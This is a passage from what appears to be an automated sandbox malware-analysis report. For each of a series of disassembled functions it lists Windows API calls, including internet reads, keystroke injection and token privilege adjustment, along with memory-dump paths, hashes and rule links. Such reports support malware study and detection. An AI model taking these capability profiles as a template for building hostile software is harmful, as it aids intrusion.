                                        • Opcode ID: cc1d19e7b7ccc4895ef5d32a76e018777d5eb086101dbf71ed2e3a7018cd8c9b
                                        • Instruction ID: 5754c4efbdbaf0e1913c0282222b7aa91cdc3fe20bd8dc1f36dbd4221fda3e52
                                        • Opcode Fuzzy Hash: cc1d19e7b7ccc4895ef5d32a76e018777d5eb086101dbf71ed2e3a7018cd8c9b
                                        • Instruction Fuzzy Hash: 0BA10760145285FAFB28BB2A4C8ED7F396DEB8A741B14492BF502D65A1CA2D9C01D373
                                        Function 007C550C Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,007C4A1E,00000000), ref: 007C55FD
                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 007C5629
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Internet$AvailableDataFileQueryRead
                                        • String ID:
                                        • API String ID: 599397726-0
                                        • Opcode ID: 27b883b3e415e62abc49d3d9577926a3be3773ac8cd2f63a4efdef57070213da
                                        • Instruction ID: 2c41411dff8497b8b6934ded45fbe734584f9672834e6a5f8759a93547cd603d
                                        • Opcode Fuzzy Hash: 27b883b3e415e62abc49d3d9577926a3be3773ac8cd2f63a4efdef57070213da
                                        • Instruction Fuzzy Hash: 0C41E671500A09FFEB109A90EC85FBFB7BEEB40714F50405EF605A6140DA7ABE819B64
                                        Function 007BEA85 Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 007BEA95
                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 007BEAEF
                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 007BEB3C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ErrorMode$DiskFreeSpace
                                        • String ID:
                                        • API String ID: 1682464887-0
                                        • Opcode ID: 11f78a78c2663e3ff915801bf3993016a74409ccd160f396d351d26aed088133
                                        • Instruction ID: fa34fe4a307d5037b34c9db618253407691e023d24984dcbd81c9b0c2b8f7c62
                                        • Opcode Fuzzy Hash: 11f78a78c2663e3ff915801bf3993016a74409ccd160f396d351d26aed088133
                                        • Instruction Fuzzy Hash: 6F213D75A00218EFCB00EFA5D895EEEBBB9FF48310F1580A9E905AB351DB35D915CB50
                                        Function 007B702F Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007B704C
                                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 007B708D
                                        • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007B7098
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CloseControlCreateDeviceFileHandle
                                        • String ID:
                                        • API String ID: 33631002-0
                                        • Opcode ID: 9bcefc3f33faee5ce9dcbf38137837979b558faea2f7ca888e1f178afe720d21
                                        • Instruction ID: 005036ffec152af2f92cd85dba5fd04a392b5b1d7baae2385871050b46dd27a4
                                        • Opcode Fuzzy Hash: 9bcefc3f33faee5ce9dcbf38137837979b558faea2f7ca888e1f178afe720d21
                                        • Instruction Fuzzy Hash: AA113C71A00228BFEB109B94DC45BEEBBBDEB45B10F108152F910E6290D6B45E018BA5
                                        Function 00776670 Relevance: 4.1, APIs: 2, Instructions: 1093COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        • Opcode ID: b068672869928ccb0bf61783a8d8a05f7ad496d4499b5efe7f47364810774244
                                        • Instruction ID: b37fd6708633f62678b23e1bcade1647e0c0c3d998992d96e63696744a38e1f5
                                        • Opcode Fuzzy Hash: b068672869928ccb0bf61783a8d8a05f7ad496d4499b5efe7f47364810774244
                                        • Instruction Fuzzy Hash: F6A25875E00219CFCF28CF58C8806ADBBB1BF48354F2581AAD959AB395D7389D81DF90
                                        Function 0078AFB4 Relevance: 3.1, APIs: 2, Instructions: 82nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0078AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0078AF8E
                                          • Part of subcall function 0078B155: GetWindowLongW.USER32(?,000000EB), ref: 0078B166
                                        • GetParent.USER32(?), ref: 007EF4B5
                                        • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,0078ADDD,?,?,?,00000006,?), ref: 007EF52F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: LongWindow$DialogNtdllParentProc_
                                        • String ID:
                                        • API String ID: 314495775-0
                                        • Opcode ID: a3eea217d9444d68df0662d2b24acf843d2d94fe0ff4f3b3d2a35e9642ac840b
                                        • Instruction ID: fe380aa5876eed4c17038a0c8686cba3478de78b464aa9a39af1eb97f1bba096
                                        • Opcode Fuzzy Hash: a3eea217d9444d68df0662d2b24acf843d2d94fe0ff4f3b3d2a35e9642ac840b
                                        • Instruction Fuzzy Hash: 8F219631641144AFDF35AF69CC4CAAA3BA2EF4A360F184264F6258B2E2D7389D11D750
                                        Function 007DF0A1 Relevance: 3.0, APIs: 2, Instructions: 46nativewindowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0078AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0078AF8E
                                        • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,007EF352,?,?,?), ref: 007DF115
                                          • Part of subcall function 0078B155: GetWindowLongW.USER32(?,000000EB), ref: 0078B166
                                        • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 007DF0FB
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: LongWindow$DialogMessageNtdllProc_Send
                                        • String ID:
                                        • API String ID: 1273190321-0
                                        • Opcode ID: 6630903ff157bf7bf4af543d11a3ea7f392d5e09bc0998caebcb0080588cc705
                                        • Instruction ID: 1d886fd1764e2c1308868cd1b85c16b74f60dd310a064cc354cca2090643b3a7
                                        • Opcode Fuzzy Hash: 6630903ff157bf7bf4af543d11a3ea7f392d5e09bc0998caebcb0080588cc705
                                        • Instruction Fuzzy Hash: 5701B131200608EBDB21AF14DC89F6A7BB6FBC5764F144525F9165B3E1C736AC12DB60
                                        Function 007DF45A Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ClientToScreen.USER32(?,?), ref: 007DF47D
                                        • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,007EF42E,?,?,?,?,?), ref: 007DF4A6
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ClientDialogNtdllProc_Screen
                                        • String ID:
                                        • API String ID: 3420055661-0
                                        • Opcode ID: e0a3916c03a32a8482ed13d1a3383c265e71f9be134e2f62214e25f1af5133cb
                                        • Instruction ID: 5119268fcab212c91ce4a2aec9976a7d1b8486357ec72b26f02111f13514eeac
                                        • Opcode Fuzzy Hash: e0a3916c03a32a8482ed13d1a3383c265e71f9be134e2f62214e25f1af5133cb
                                        • Instruction Fuzzy Hash: 9CF01772400118FFEF049F95DC099BEBBB9FF44351F10802AF902A2160D7B9AE51EB64
                                        Function 007BD712 Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,007CC2E2,?,?,00000000,?), ref: 007BD73F
                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,007CC2E2,?,?,00000000,?), ref: 007BD751
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ErrorFormatLastMessage
                                        • String ID:
                                        • API String ID: 3479602957-0
                                        • Opcode ID: ea78f416b928c7ed6c344f58f7dc472c0a2d7b9d0553974c09f3f2a65e6fbaf0
                                        • Instruction ID: 13006279f44ff5c50324529493578368ce9656ebe1b0d6bfc7bb5abed8c86905
                                        • Opcode Fuzzy Hash: ea78f416b928c7ed6c344f58f7dc472c0a2d7b9d0553974c09f3f2a65e6fbaf0
                                        • Instruction Fuzzy Hash: 4EF08C3510032DEBDB21AFA4CC4DFEA776DBF493A1F008155B909D6181E6389E40CBA4
                                        Function 007B4B52 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 007B4B89
                                        • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 007B4B9C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: InputSendkeybd_event
                                        • String ID:
                                        • API String ID: 3536248340-0
                                        • Opcode ID: bb7886872b24de5a1a1a5033bca70130ba9ba61c92001be34d40016e0cb3112f
                                        • Instruction ID: 921ebbbbb03563ed505a1f414ca319efdb1102b1f7db37018b7b2de983593de9
                                        • Opcode Fuzzy Hash: bb7886872b24de5a1a1a5033bca70130ba9ba61c92001be34d40016e0cb3112f
                                        • Instruction Fuzzy Hash: DCF06D7080424DAFDB058FA0C805BBE7BB4AF00305F00C409F961A6192D779CA15DFA4
                                        Function 007AB8B0 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                        Download Yara Rule
                                        APIs
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007AB9EC), ref: 007AB8C5
                                        • CloseHandle.KERNEL32(?,?,007AB9EC), ref: 007AB8D7
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: AdjustCloseHandlePrivilegesToken
                                        • String ID:
                                        • API String ID: 81990902-0
                                        • Opcode ID: 08a8679201abb65b48382868c4276e5a5e2e635ce53224aa08db9090773b7c92
                                        • Instruction ID: 0ba75e80f8bf160826fcc5bd51aac0613c86a33b2151b69c8832b96e91b8d220
                                        • Opcode Fuzzy Hash: 08a8679201abb65b48382868c4276e5a5e2e635ce53224aa08db9090773b7c92
                                        • Instruction Fuzzy Hash: E8E0B672014611EEEB262B64FC09DBA7BEAEF04311B11C929F59681470DB6AAC90EB50
                                        Function 007DF594 Relevance: 3.0, APIs: 2, Instructions: 21nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowLongW.USER32(?,000000EC), ref: 007DF59C
                                        • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,007EF3AD,?,?,?,?), ref: 007DF5C6
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: DialogLongNtdllProc_Window
                                        • String ID:
                                        • API String ID: 2065330234-0
                                        • Opcode ID: 6ef4dda3fcf20135aad99985f617f25ff6cc3c9cdc4ff4d2bf9e73e024c7003a
                                        • Instruction ID: 5b93a6bdc620ad20cf21515c767e37fb5ae1acb4f6dd699c3cbfb381db5dbad4
                                        • Opcode Fuzzy Hash: 6ef4dda3fcf20135aad99985f617f25ff6cc3c9cdc4ff4d2bf9e73e024c7003a
                                        • Instruction Fuzzy Hash: E2E08C30104218BBEB240F09EC0AFB93B29EB00B90F108526F917C90E0D7B898B0E664
                                        Function 00798E3C Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,0077125D,00797A43,00770F35,?,?,00000001), ref: 00798E41
                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00798E4A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: 73ce1a2a2cbde7a1fa0e3a18cba09e7660a381b54aca14e3a4dc170cdad23696
                                        • Instruction ID: 6287cc2a67df2e4c5a4c3e9feb32d5c4dbe3f98eb3cb547a40d077ee670ac38e
                                        • Opcode Fuzzy Hash: 73ce1a2a2cbde7a1fa0e3a18cba09e7660a381b54aca14e3a4dc170cdad23696
                                        • Instruction Fuzzy Hash: 62B09271058A08EBEB102BA1EC09BA83F6AEF0AA62F008010F71D440608B675850CA9A
                                        Function 007A113E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a874b3df759633b79cc4b542c3e3b7957d91158d9f2a140e4559e9266551a966
                                        • Instruction ID: e0b4c917b7ababeb0f37fbfcc8d1079bf414794e0ae577f0b8bfe92ebaafcb1d
                                        • Opcode Fuzzy Hash: a874b3df759633b79cc4b542c3e3b7957d91158d9f2a140e4559e9266551a966
                                        • Instruction Fuzzy Hash: 63B1EF20E2AF404DD6639639883533BB65CBFBB2C5F91D71BFC2A74D62EB2185834580
                                        Function 007E02AA Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0078AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0078AF8E
                                        • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 007E0352
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: DialogLongNtdllProc_Window
                                        • String ID:
                                        • API String ID: 2065330234-0
                                        • Opcode ID: ea66fd958cbaff0f2bbdf71abe716f79e1409ad0d594e6c8126574b754c0ed74
                                        • Instruction ID: f6685e938a08ea62ff947ea98cd899d5a9ad9a027ee5e978b714701877660d63
                                        • Opcode Fuzzy Hash: ea66fd958cbaff0f2bbdf71abe716f79e1409ad0d594e6c8126574b754c0ed74
                                        • Instruction Fuzzy Hash: DC113D31205295FFFB241B2DCC49F793714E749720F244329F9215A5E2CAEC8D40D2E9
                                        Function 007DE769 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0078B155: GetWindowLongW.USER32(?,000000EB), ref: 0078B166
                                        • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 007DE7AF
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$CallLongProc
                                        • String ID:
                                        • API String ID: 4084987330-0
                                        • Opcode ID: 4f250085a2989b4656420c399d4fa841e8cd87bf337dd2201233b3774ca7d75a
                                        • Instruction ID: c26c0334449a7812217a65d14be42917d0e394edfc7d0134e0df13ed6c662144
                                        • Opcode Fuzzy Hash: 4f250085a2989b4656420c399d4fa841e8cd87bf337dd2201233b3774ca7d75a
                                        • Instruction Fuzzy Hash: 4CF0FF3510010CEFCF56AF94DC44DB93BB6FB44360B048525F9558B6A1C7369D70EB94
                                        Function 007DEA4E Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                        Download Yara Rule
                                        APIs
